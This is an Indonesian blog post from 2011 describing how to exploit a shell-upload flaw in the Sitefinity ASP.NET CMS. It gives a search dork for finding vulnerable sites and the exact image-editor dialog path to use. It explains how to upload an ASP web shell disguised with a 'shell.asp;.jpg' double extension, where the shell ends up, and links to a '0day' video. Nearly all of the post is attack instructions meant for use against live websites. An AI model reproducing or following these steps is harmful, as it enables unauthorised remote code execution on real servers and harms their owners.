Senin, 07 Maret 2011

CMS (ASP.NET) Shell Upload Vulnerability 

dork : "Sitefinity: Login"
 
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
 
first go to # http://site.com/sitefinity/
 
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
 
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
 
Upload to # http://site.com/Images/[shell]
 
Video : http://net-edit0r.persiangig.com/Film/0day.rar
Diposting oleh dedexcaem di 20.16
Label:
 
blogger templates